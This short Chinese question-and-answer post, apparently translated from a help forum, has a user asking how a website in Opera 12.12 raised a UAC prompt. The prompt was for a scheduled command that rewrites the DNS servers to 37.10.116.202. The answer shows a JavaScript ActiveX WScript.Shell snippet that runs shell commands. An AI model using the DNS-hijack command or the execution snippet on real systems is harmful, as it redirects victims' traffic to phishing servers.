前段时间,当我使用 Opera 12.12 访问某个网站时,屏幕上出现了 Windows 7 UAC 提示:
C:\Windows\SysWOW64\cmd.exe /c at 13:29:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.202", "8.8.8.8")
显然,我拒绝了。
网络钓鱼者试图获取我的数据的方法非常清楚,但是他们是如何设法从浏览器执行命令的呢?
答案1
网络钓鱼者可能会使用如下 JavaScript:
var wsh = new ActiveXObject('WScript.Shell');
command = 'cmd /k ' + 'what ever ...';
wsh.Run(command);
仅当您关闭浏览器中需要使用 ActiveX 的安全功能时它才会起作用。